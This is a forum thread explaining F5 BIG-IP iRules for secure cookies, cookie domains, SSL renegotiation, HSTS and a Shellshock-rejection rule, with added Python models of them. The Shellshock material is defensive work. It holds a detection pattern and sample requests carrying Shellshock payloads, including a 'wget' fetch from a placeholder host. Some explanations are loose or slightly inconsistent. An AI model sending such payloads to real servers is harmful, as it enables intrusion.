Forum Discussion
Can somebody help me understand the iRules below for secure cookies?
Number 1 rule for Secure Cookies:
ltm rule SPOG-Secure-Cookies {
    partition SKP
    when HTTP_RESPONSE {
        # every cookie name in this response
        set myValues [HTTP::cookie names]
        foreach mycookies $myValues {
            # add the Secure attribute to each Set-Cookie
            HTTP::cookie secure $mycookies enable
        }
    }
}
Number 2 rule:
ltm rule SPOG-Domain-Cookies-IMC.com {
    partition SKP
    when HTTP_RESPONSE {
        log local0. "[IP::client_addr]:[TCP::client_port]: Pre Set-Cookies: [HTTP::header values Set-Cookie]"
        # Check if the persistence cookie exists in the response
        if {[HTTP::cookie exists "PD-L-SESSION"]} {
            # set the domain attribute on the persistence cookie
            HTTP::cookie domain "PD-L-SESSION" ".ironmountainconnect.com"
            log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-SESSION"
        }
        if {[HTTP::cookie exists "PD-L-LAT"]} {
            # set the domain attribute on the persistence cookie
            HTTP::cookie domain "PD-L-LAT" ".ironmountainconnect.com"
            log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-LAT"
        }
        log local0. "[IP::client_addr]:[TCP::client_port]: Post Set-Cookies: [HTTP::header values Set-Cookie]"
    }
}
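To see what these two rules do to a response, here is an added example (not from the thread, and not an iRule) that re-creates their logic in plain Python over a few constructed Set-Cookie headers: every cookie gets the Secure flag once, and only the two persistence cookies get their Domain rewritten to .ironmountainconnect.com, replacing any Domain the server already sent. The cookie names and the domain are taken from the rules above; the helper names and the sample headers are my own, and the attribute order is not meant to match BIG-IP output byte for byte.

```python
# Added example: a plain-Python model of the two iRules' effect on Set-Cookie
# headers, so the before/after can be checked without a BIG-IP.
# Helper names and sample headers are constructed for this example.

PERSISTENCE_COOKIES = ("PD-L-SESSION", "PD-L-LAT")   # from the second rule
COOKIE_DOMAIN = ".ironmountainconnect.com"          # from the second rule


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, [attribute strings])."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    return name.strip(), value, parts[1:]


def build_set_cookie(name, value, attrs):
    return "; ".join([f"{name}={value}", *attrs])


def secure_cookies(headers):
    """SPOG-Secure-Cookies: add the Secure flag to every cookie.
    Idempotent: a cookie that already carries Secure is left alone."""
    out = []
    for h in headers:
        name, value, attrs = parse_set_cookie(h)
        if not any(a.lower() == "secure" for a in attrs):
            attrs.append("Secure")
        out.append(build_set_cookie(name, value, attrs))
    return out


def domain_cookies(headers, names=PERSISTENCE_COOKIES, domain=COOKIE_DOMAIN):
    """SPOG-Domain-Cookies: set Domain on the named cookies only,
    replacing any Domain attribute the server already sent."""
    out = []
    for h in headers:
        name, value, attrs = parse_set_cookie(h)
        if name in names:
            attrs = [a for a in attrs if not a.lower().startswith("domain=")]
            attrs.append(f"Domain={domain}")
        out.append(build_set_cookie(name, value, attrs))
    return out


def apply_irules(headers):
    """Both rules, in the order they fire on HTTP_RESPONSE."""
    return domain_cookies(secure_cookies(headers))


# Constructed sample response headers (not captured from the real site)
SAMPLE_SET_COOKIE = [
    "PD-L-SESSION=abc123; Path=/; HttpOnly",
    "PD-L-LAT=xyz; Path=/; Domain=app.ironmountainconnect.com",
    "JSESSIONID=9F2C; Path=/app; Secure; HttpOnly",
]

if __name__ == "__main__":
    for before, after in zip(SAMPLE_SET_COOKIE, apply_irules(SAMPLE_SET_COOKIE)):
        print("Pre: ", before)
        print("Post:", after)
```

One caveat on the first rule: it marks every cookie Secure, so it only makes sense on an HTTPS virtual server; a modern browser will not store a Secure cookie it receives over plain HTTP.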
4 Replies
- Samir_Jha_52506
Noctilucent
Hi, find the details below. Please correct me if anything is wrong.
ltm rule SPOG-Secure-Cookies {                  --> name of the iRule
    partition SKP                               --> partition name SKP, where the iRule is stored
    when HTTP_RESPONSE {
        set myValues [HTTP::cookie names]           --> storing the cookie value in the "myValues" variable
        foreach mycookies $myValues {               --> passing the 'myValues' value into mycookies one by one through the loop
            HTTP::cookie secure $mycookies enable   --> enabling the cookie in the browser
        }
    }
}

ltm rule SPOG-Domain-Cookies-IMC.com {          --> name of the iRule
    partition SKP                               --> partition name SKP, where the iRule is stored
    when HTTP_RESPONSE {
        log local0. "[IP::client_addr]:[TCP::client_port]: Pre Set-Cookies: [HTTP::header values Set-Cookie]"
                                                --> log message "client IP:port": header cookie values
        # Check if the persistence cookie exists in the response
        if {[HTTP::cookie exists "PD-L-SESSION"]} {     --> checks the cookie value
            # set the domain attribute on the persistence cookie
            HTTP::cookie domain "PD-L-SESSION" ".ironmountainconnect.com"   --> adding the cookie value in "ironmountainconnect.com"
            log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-SESSION"
        }                                       --> log message "client IP:port: Modified domain on PD-L-SESSION"
        if {[HTTP::cookie exists "PD-L-LAT"]} {         --> checks the cookie value
            # set the domain attribute on the persistence cookie
            HTTP::cookie domain "PD-L-LAT" ".ironmountainconnect.com"       --> adding the cookie value in "ironmountainconnect.com"
            log local0. "[IP::client_addr]:[TCP::client_port]: Modified domain on PD-L-LAT"
        }                                       --> log message "client IP:port: Modified domain on PD-L-LAT"
        log local0. "[IP::client_addr]:[TCP::client_port]: Post Set-Cookies: [HTTP::header values Set-Cookie]"
    }
}                                               --> log message "client IP:port: Post Set-Cookies: PD-L-LAT"

- dipta_03_149731
Nimbostratus
Thanks for the quick response, Samir. Yes, the above solution is correct, and I could find the result in my tcpdump output. Could you also tell me the meaning of the iRules below and why we should use them?
1. ltm rule SSL-Renegotatiation-disabled {
       when CLIENTSSL_HANDSHAKE priority 1 {
           SSL::renegotiate disable
       }
   }

2. didey@(kan-qa-vf5-a)(cfg-sync In Sync)(Active)(/Common)(tmos) list ltm rule Shellshock_reject
   ltm rule Shellshock_reject {
       when HTTP_REQUEST {
           # Glob for [string match]: the leading and trailing * are what make this a
           # substring test; a bare "() {" would only match a value that is exactly "() {"
           set pattern "*() \{*";
           if { [string match $pattern [HTTP::uri]] } {
               log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in URI '[HTTP::uri]'";
               reject;
           } else {
               # check every value of every request header
               foreach header_name [HTTP::header names] {
                   foreach header_value [HTTP::header values $header_name] {
                       if { [string match $pattern $header_value] } {
                           log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in HTTP Header $header_name = '$header_value'; URI = '[HTTP::uri]'";
                           reject;
                           break;
                       }
                   }
               }
           }
       }
   }

3. ltm rule HSTS-iRule {
       when HTTP_RESPONSE {
           HTTP::header insert Strict-Transport-Security "max-age=31536000; includeSubDomains"
       }
   }
- Samir_Jha_52506
Noctilucent
1. ltm rule SSL-Renegotatiation-disabled {
       when CLIENTSSL_HANDSHAKE priority 1 {
           SSL::renegotiate disable
       }
   }

Enables or disables the ability of the peer to request renegotiation. Renegotiation is enabled by default in BIG-IP versions prior to 10.1.0. When disabled, the peer is not allowed to request SSL renegotiation. Disabling SSL renegotiation can be used to prevent the SSL injection vulnerability in applications which do not require SSL renegotiation.

2. didey@(kan-qa-vf5-a)(cfg-sync In Sync)(Active)(/Common)(tmos) list ltm rule Shellshock_reject
   ltm rule Shellshock_reject {                  ---> rule name
       when HTTP_REQUEST {
           # Glob for [string match]: the leading and trailing * make this a substring test
           set pattern "*() \{*";
           if { [string match $pattern [HTTP::uri]] } {
               log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in URI '[HTTP::uri]'";
               reject;
           } else {
               foreach header_name [HTTP::header names] {
                   foreach header_value [HTTP::header values $header_name] {
                       if { [string match $pattern $header_value] } {
                           log local0. "Detected CVE-2014-6271 attack from '[IP::client_addr]' in HTTP Header $header_name = '$header_value'; URI = '[HTTP::uri]'";
                           reject;
                           break;
                       }
                   }
               }
           }
       }
   }

This rule basically matches a certain pattern and rejects the connection on the VIP.

3. ltm rule HSTS-iRule {
       when HTTP_RESPONSE {
           HTTP::header insert Strict-Transport-Security "max-age=31536000; includeSubDomains"
       }
   }

HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click-through prompts in browsers.
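The Shellshock_reject rule is a plain substring signature: the same glob is tried against the URI and then against every value of every request header, and the first hit is logged and rejected. As an added example (not from the thread and not F5 code), here is that check in Python over a few constructed requests, using fnmatchcase, which follows the same wildcard rules as Tcl's case-sensitive [string match]. It also shows why the pattern needs the leading and trailing *: without them the glob only matches a value that is exactly "() {" and a real payload sails through. The request samples and function names are my own.

```python
# Added example: the Shellshock_reject iRule's matching logic in Python, run
# over constructed requests. fnmatchcase uses the same *, ? and [...] glob
# syntax as Tcl's [string match], and is case-sensitive like it.
from fnmatch import fnmatchcase

# The wildcards on both ends make this a substring test. The bare "() {"
# (no stars) only matches a value that is exactly "() {".
PATTERN = "*() {*"


def find_shellshock(uri, headers, pattern=PATTERN):
    """Return where the pattern first matched: 'uri', the header name, or None.
    Same order as the iRule: URI first, then every value of every header."""
    if fnmatchcase(uri, pattern):
        return "uri"
    for name, value in headers:
        if fnmatchcase(value, pattern):
            return name
    return None


# Constructed requests (hypothetical, not captured traffic)
REQUESTS = {
    "benign": ("/cgi-bin/status",
               [("Host", "www.example.com"), ("User-Agent", "curl/7.38")]),
    "ua_payload": ("/cgi-bin/status",
                   [("Host", "www.example.com"),
                    ("User-Agent", "() { :; }; /bin/bash -c 'id'")]),
    "uri_payload": ("/cgi-bin/status?x=() { :;}; echo",
                    [("Host", "www.example.com")]),
    "cookie_payload": ("/",
                       [("Cookie", "a=() { ignored; }; wget http://x/y")]),
}


def classify(requests=REQUESTS, pattern=PATTERN):
    """Map each request label to where the signature fired (or None)."""
    return {label: find_shellshock(uri, hdrs, pattern)
            for label, (uri, hdrs) in requests.items()}


if __name__ == "__main__":
    print("with wildcards:   ", classify())
    print("bare '() {' only: ", classify(pattern="() {"))
```

The second print line is the point of the example: with the pattern as it appears in the pasted rule text (no wildcards) every request, including the payloads, comes back as None. Note also that this is a signature for the original CVE-2014-6271 trigger string only; it is a quick mitigation, not a substitute for patching bash on the back-end hosts.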
- dipta_03_149731
Nimbostratus
Thanks a lot, Samir, for replying to all the queries. This is very helpful.